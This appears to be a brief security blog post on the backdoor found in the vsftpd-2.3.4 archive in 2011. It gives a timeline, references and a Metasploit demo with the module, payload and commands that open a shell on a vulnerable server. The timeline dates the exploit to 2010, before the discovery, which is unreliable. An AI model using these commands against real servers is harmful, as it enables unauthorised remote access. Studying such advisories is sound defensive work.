wowzataz asked:
Blog : eromang.zataz.com Twitter twitter.com Timeline : Backdoor discovered by Mathias Kresin Source code correction the 2011-07-03 Metasploit exploit released the 2010-07-04 Provided by: hdm References : pastebin.com scarybeastsecurity.blogspot.com download.polytechnic.edu.na Affected versions : vsftpd-2.3.4 from 2011-06-30 Tested on Ubuntu Lucid 10.04.1 LTS with vsftpd-2.3.4 Thanks for the diffs 🙂 Description: This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was present in the vsftpd-2.3.4.tar.gz archive sometime before July 3rd 2011. Metasploit demo : use exploit/unix/ftp/vsftpd_234_backdoor set RHOST localhost set PAYLOAD cmd/unix/interact exploit id uname -a
Advertisement
